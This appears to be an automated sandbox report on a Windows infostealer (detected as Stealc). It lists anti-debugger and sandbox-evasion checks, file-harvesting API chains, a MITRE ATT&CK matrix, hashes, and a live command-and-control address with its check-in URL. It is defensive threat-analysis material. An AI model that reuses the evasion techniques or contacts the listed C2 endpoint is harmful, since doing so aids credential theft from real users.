                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4ED035D second address: 4ED03C9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F5CB8E4DDA3h 0x00000010 or si, 482Eh 0x00000015 jmp 00007F5CB8E4DDA9h 0x0000001a popfd 0x0000001b push esi 0x0000001c mov edi, 62B92742h 0x00000021 pop ebx 0x00000022 popad 0x00000023 mov ebp, esp 0x00000025 jmp 00007F5CB8E4DDA6h 0x0000002a pop ebp 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f jmp 00007F5CB8E4DD9Ah 0x00000034 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4ED03C9 second address: 4ED03D8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5CB8E4899Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 1111B82 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 110F4EE instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 1347C3F instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00EC38B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,1_2_00EC38B0
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00EC4910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_00EC4910
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00EBDA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,1_2_00EBDA80
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00EBE430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,1_2_00EBE430
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00EC4570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,1_2_00EC4570
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00EBED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,1_2_00EBED20
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00EB16D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_00EB16D0
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00EC3EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,1_2_00EC3EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00EBF6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_00EBF6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00EBBE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,1_2_00EBBE70
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00EBDE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_00EBDE10
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00EB1160 GetSystemInfo,ExitProcess,1_2_00EB1160
                Source: file.exe, file.exe, 00000001.00000002.1709187719.0000000001295000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exeBinary or memory string: hGfS'
                Source: file.exe, 00000001.00000002.1705510345.0000000000A7E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                Source: file.exe, 00000001.00000002.1705510345.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.1705510345.0000000000AF4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: file.exe, 00000001.00000002.1705510345.0000000000AF4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWh
                Source: file.exe, 00000001.00000002.1709187719.0000000001295000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_1-13588
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_1-13585
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_1-13605
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_1-13600
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_1-13639
                Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00EB45C0 VirtualProtect ?,00000004,00000100,000000001_2_00EB45C0
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00EC9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_00EC9860
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00EC9750 mov eax, dword ptr fs:[00000030h]1_2_00EC9750
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00EC78E0 GetProcessHeap,RtlAllocateHeap,GetComputerNameA,1_2_00EC78E0
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeMemory protected: page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 7008, type: MEMORYSTR
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00EC9600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,1_2_00EC9600
                Source: file.exe, file.exe, 00000001.00000002.1709187719.0000000001295000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: di.EProgram Manager
                Source: file.exe, 00000001.00000002.1709187719.0000000001295000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: odi.EProgram Manager
                Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,1_2_00EC7B90
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00EC7980 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA,1_2_00EC7980
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00EC7850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,1_2_00EC7850
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00EC7A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,1_2_00EC7A30

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 1.2.file.exe.eb0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000001.00000002.1705510345.0000000000A7E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000003.1656947886.0000000004D40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 7008, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: 1.2.file.exe.eb0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000001.00000002.1705510345.0000000000A7E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000003.1656947886.0000000004D40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 7008, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                Command and Scripting Interpreter
                1
                DLL Side-Loading
                11
                Process Injection
                1
                Masquerading
                OS Credential Dumping2
                System Time Discovery
                Remote Services1
                Archive Collected Data
                2
                Encrypted Channel
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts11
                Native API
                Boot or Logon Initialization Scripts1
                DLL Side-Loading
                33
                Virtualization/Sandbox Evasion
                LSASS Memory641
                Security Software Discovery
                Remote Desktop ProtocolData from Removable Media2
                Ingress Tool Transfer
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                Disable or Modify Tools
                Security Account Manager33
                Virtualization/Sandbox Evasion
                SMB/Windows Admin SharesData from Network Shared Drive2
                Non-Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                Process Injection
                NTDS13
                Process Discovery
                Distributed Component Object ModelInput Capture12
                Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information
                LSA Secrets1
                Account Discovery
                SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
                Obfuscated Files or Information
                Cached Domain Credentials1
                System Owner/User Discovery
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                Software Packing
                DCSync1
                File and Directory Discovery
                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                DLL Side-Loading
                Proc Filesystem324
                System Information Discovery
                Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                file.exe47%ReversingLabsWin32.Trojan.Generic
                file.exe100%AviraTR/Crypt.TPM.Gen
                file.exe100%Joe Sandbox ML
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                http://185.215.113.37/100%URL Reputationmalware
                http://185.215.113.37100%URL Reputationmalware
                http://185.215.113.37/e2b1563c6670f193.php100%URL Reputationmalware
                No contacted domains info
                NameMaliciousAntivirus DetectionReputation
                http://185.215.113.37/true
                • URL Reputation: malware
                unknown
                http://185.215.113.37/e2b1563c6670f193.phptrue
                • URL Reputation: malware
                unknown
                NameSourceMaliciousAntivirus DetectionReputation
                http://185.215.113.37/afile.exe, 00000001.00000002.1705510345.0000000000ADA000.00000004.00000020.00020000.00000000.sdmptrue
                  unknown
                  http://185.215.113.37file.exe, 00000001.00000002.1705510345.0000000000A7E000.00000004.00000020.00020000.00000000.sdmptrue
                  • URL Reputation: malware
                  unknown
                  http://185.215.113.37/e2b1563c6670f193.php?file.exe, 00000001.00000002.1705510345.0000000000ADA000.00000004.00000020.00020000.00000000.sdmptrue
                    unknown
                    http://185.215.113.37/e2b1563c6670f193.phphfile.exe, 00000001.00000002.1705510345.0000000000AF4000.00000004.00000020.00020000.00000000.sdmptrue
                      unknown
                      http://185.215.113.37/e2b1563c6670f193.phpGfile.exe, 00000001.00000002.1705510345.0000000000ADA000.00000004.00000020.00020000.00000000.sdmptrue
                        unknown
                        http://185.215.113.37sofile.exe, 00000001.00000002.1705510345.0000000000A7E000.00000004.00000020.00020000.00000000.sdmptrue
                          unknown
                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs
                          IPDomainCountryFlagASNASN NameMalicious
                          185.215.113.37
                          unknownPortugal
                          206894WHOLESALECONNECTIONSNLtrue
                          Joe Sandbox version:41.0.0 Charoite
                          Analysis ID:1538495
                          Start date and time:2024-10-21 13:08:37 +02:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:0h 4m 31s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                          Number of analysed new started processes analysed:6
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Sample name:file.exe
                          Detection:MAL
                          Classification:mal100.troj.evad.winEXE@1/0@0/1
                          EGA Information:
                          • Successful, ratio: 100%
                          HCA Information:
                          • Successful, ratio: 80%
                          • Number of executed functions: 19
                          • Number of non-executed functions: 87
                          Cookbook Comments:
                          • Found application associated with file extension: .exe
                          • Stop behavior analysis, all processes terminated
                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe
                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                          • Not all processes where analyzed, report is missing behavior information
                          • Report size getting too big, too many NtQueryValueKey calls found.
                          • VT rate limit hit for: file.exe
                          No simulations
                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          185.215.113.37file.exeGet hashmaliciousStealc, VidarBrowse
                          • 185.215.113.37/e2b1563c6670f193.php
                          file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                          • 185.215.113.37/
                          file.exeGet hashmaliciousStealcBrowse
                          • 185.215.113.37/e2b1563c6670f193.php
                          file.exeGet hashmaliciousStealcBrowse
                          • 185.215.113.37/e2b1563c6670f193.php
                          file.exeGet hashmaliciousStealc, VidarBrowse
                          • 185.215.113.37/e2b1563c6670f193.php
                          file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                          • 185.215.113.37/e2b1563c6670f193.php
                          file.exeGet hashmaliciousStealcBrowse
                          • 185.215.113.37/e2b1563c6670f193.php
                          file.exeGet hashmaliciousStealc, VidarBrowse
                          • 185.215.113.37/e2b1563c6670f193.php
                          file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                          • 185.215.113.37/e2b1563c6670f193.php
                          file.exeGet hashmaliciousStealcBrowse
                          • 185.215.113.37/e2b1563c6670f193.php
                          No context
                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousStealc, VidarBrowse
                          • 185.215.113.37
                          file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                          • 185.215.113.16
                          file.exeGet hashmaliciousStealcBrowse
                          • 185.215.113.37
                          file.exeGet hashmaliciousStealcBrowse
                          • 185.215.113.37
                          file.exeGet hashmaliciousStealc, VidarBrowse
                          • 185.215.113.37
                          file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                          • 185.215.113.16
                          file.exeGet hashmaliciousStealcBrowse
                          • 185.215.113.37
                          file.exeGet hashmaliciousStealc, VidarBrowse
                          • 185.215.113.37
                          file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                          • 185.215.113.16
                          file.exeGet hashmaliciousStealcBrowse
                          • 185.215.113.37
                          No context
                          No context
                          No created / dropped files found
                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Entropy (8bit):7.946306853072789
                          TrID:
                          • Win32 Executable (generic) a (10002005/4) 99.96%
                          • Generic Win/DOS Executable (2004/3) 0.02%
                          • DOS Executable Generic (2002/1) 0.02%
                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                          File name:file.exe
                          File size:1'856'000 bytes
                          MD5:23b93e56b64c319ccc5f1754135ebd10
                          SHA1:618c1cc4b62e2ef7ec0af6462a180910e6ffe973
                          SHA256:f0c4061792e560aa59a73574ea3824945a4394298bf2b9ad3e5b494e233c9790
                          SHA512:6f466ca15421b6e7ffa2f83c0bebb524199cc0a961744ecc6b7a648a03ad8a20cd429d0983375138157196f314fc65b46d915c10466f08307a582eb9493aab6e
                          SSDEEP:24576:KfhokCGLNusYygEaRJIRprVltfYoIUytYRmJchkzc5yd+0HQXWezJS+RvwXiMx1:shokJVqErNBfOUyCROcdEdIJxR2i4
                          TLSH:118533B46EA6FEBAC5C41930B20AEE56F17BEB5154A55BD00CEC01F763870E161F7884
                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...J..f...........
                          Icon Hash:00928e8e8686b000
                          Entrypoint:0xaa1000
                          Entrypoint Section:.taggant
                          Digitally signed:false
                          Imagebase:0x400000
                          Subsystem:windows gui
                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                          DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                          Time Stamp:0x66F99A4A [Sun Sep 29 18:19:54 2024 UTC]
                          TLS Callbacks:
                          CLR (.Net) Version:
                          OS Version Major:5
                          OS Version Minor:1
                          File Version Major:5
                          File Version Minor:1
                          Subsystem Version Major:5
                          Subsystem Version Minor:1
                          Import Hash:2eabe9054cad5152567f0699947a2c5b
                          Instruction
                          jmp 00007F5CB88E77AAh
                          wrmsr
                          sbb al, 00h
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          jmp 00007F5CB88E97A5h
                          add byte ptr [ecx], al
                          or al, byte ptr [eax]
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], dh
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [ecx], al
                          or al, byte ptr [eax]
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [ecx], al
                          add byte ptr [eax], 00000000h
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          adc byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          or ecx, dword ptr [edx]
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          Programming Language:
                          • [C++] VS2010 build 30319
                          • [ASM] VS2010 build 30319
                          • [ C ] VS2010 build 30319
                          • [ C ] VS2008 SP1 build 30729
                          • [IMP] VS2008 SP1 build 30729
                          • [LNK] VS2010 build 30319
                          NameVirtual AddressVirtual Size Is in Section
                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_IMPORT0x25d0500x64.idata
                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x25d1f80x8.idata
                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                          0x10000x25b0000x22800d443f9a61bae37bd04d13ee9bb24c71eunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          .rsrc 0x25c0000x10000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          .idata 0x25d0000x10000x200c60c4959cc8d384ac402730cc6842bb0False0.1328125data0.9064079259880791IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          0x25e0000x2a30000x2004f1097dbf1cfcf30ec2a49ec647af720unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          qmrtgfvc0x5010000x19f0000x19f0009cbf4d1676127445f52bbccf7449b469False0.9948942253388554data7.95313047636981IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          elheadqd0x6a00000x10000x400388db2877000f20df6049b3a1bd5eaa3False0.744140625data5.861942455554407IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          .taggant0x6a10000x30000x22002083c1494f122a54b2b090f2696a2b2fFalse0.050551470588235295DOS executable (COM)0.48675437844323005IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          DLLImport
                          kernel32.dlllstrcpy
                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                          2024-10-21T13:10:17.622612+02002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.949705185.215.113.3780TCP
                          TimestampSource PortDest PortSource IPDest IP
                          Oct 21, 2024 13:10:16.422823906 CEST4970580192.168.2.9185.215.113.37
                          Oct 21, 2024 13:10:16.428611994 CEST8049705185.215.113.37192.168.2.9
                          Oct 21, 2024 13:10:16.428875923 CEST4970580192.168.2.9185.215.113.37
                          Oct 21, 2024 13:10:16.429017067 CEST4970580192.168.2.9185.215.113.37
                          Oct 21, 2024 13:10:16.434351921 CEST8049705185.215.113.37192.168.2.9
                          Oct 21, 2024 13:10:17.331805944 CEST8049705185.215.113.37192.168.2.9
                          Oct 21, 2024 13:10:17.331866980 CEST4970580192.168.2.9185.215.113.37
                          Oct 21, 2024 13:10:17.335764885 CEST4970580192.168.2.9185.215.113.37
                          Oct 21, 2024 13:10:17.341120958 CEST8049705185.215.113.37192.168.2.9
                          Oct 21, 2024 13:10:17.622555971 CEST8049705185.215.113.37192.168.2.9
                          Oct 21, 2024 13:10:17.622612000 CEST4970580192.168.2.9185.215.113.37
                          Oct 21, 2024 13:10:20.573594093 CEST4970580192.168.2.9185.215.113.37
                          • 185.215.113.37
